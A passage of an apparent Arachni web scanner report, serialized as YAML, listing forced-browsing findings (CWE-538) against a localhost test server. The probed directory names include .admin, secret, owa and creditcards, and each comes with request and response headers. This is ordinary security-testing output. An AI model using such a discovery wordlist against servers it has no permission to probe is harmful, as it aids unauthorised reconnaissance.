    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: .adm
    injected: .adm
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: .adm
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/.adm/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/.admin/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: .admin
    injected: .admin
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: .admin
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/.admin/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/~admin/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: ~admin
    injected: ~admin
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: ~admin
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/~admin/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/secret/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: secret
    injected: secret
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: secret
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/secret/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/owa/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "3"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: owa
    injected: owa
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: owa
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/owa/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/db2/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "3"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: db2
    injected: db2
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: db2
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/db2/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/mrtg/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: mrtg
    injected: mrtg
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: mrtg
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/mrtg/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/other/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: other
    injected: other
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: other
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/other/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/accounts/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "8"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: accounts
    injected: accounts
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: accounts
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/accounts/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/warez/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: warez
    injected: warez
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: warez
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/warez/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/my/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "2"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: my
    injected: my
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: my
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/my/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/cc/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "2"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: cc
    injected: cc
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: cc
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/cc/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/creditcards/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "11"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: creditcards
    injected: creditcards
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: creditcards
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/creditcards/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/contact/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: contact
    injected: contact
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: contact
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/contact/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/press/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: press
    injected: press
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: press
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/press/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/p0rn/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: p0rn
    injected: p0rn
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: p0rn
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/p0rn/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/pron/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: pron
    injected: pron
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: pron
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/pron/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/new%20folder/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "12"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: new%20folder
    injected: new%20folder
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: new%20folder
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/new%20folder/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/New%20Folder/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "12"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: New%20Folder
    injected: New%20Folder
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: New%20Folder
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/New%20Folder/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/oldfiles/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "8"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: oldfiles
    injected: oldfiles
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: oldfiles
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/oldfiles/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/old_files/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
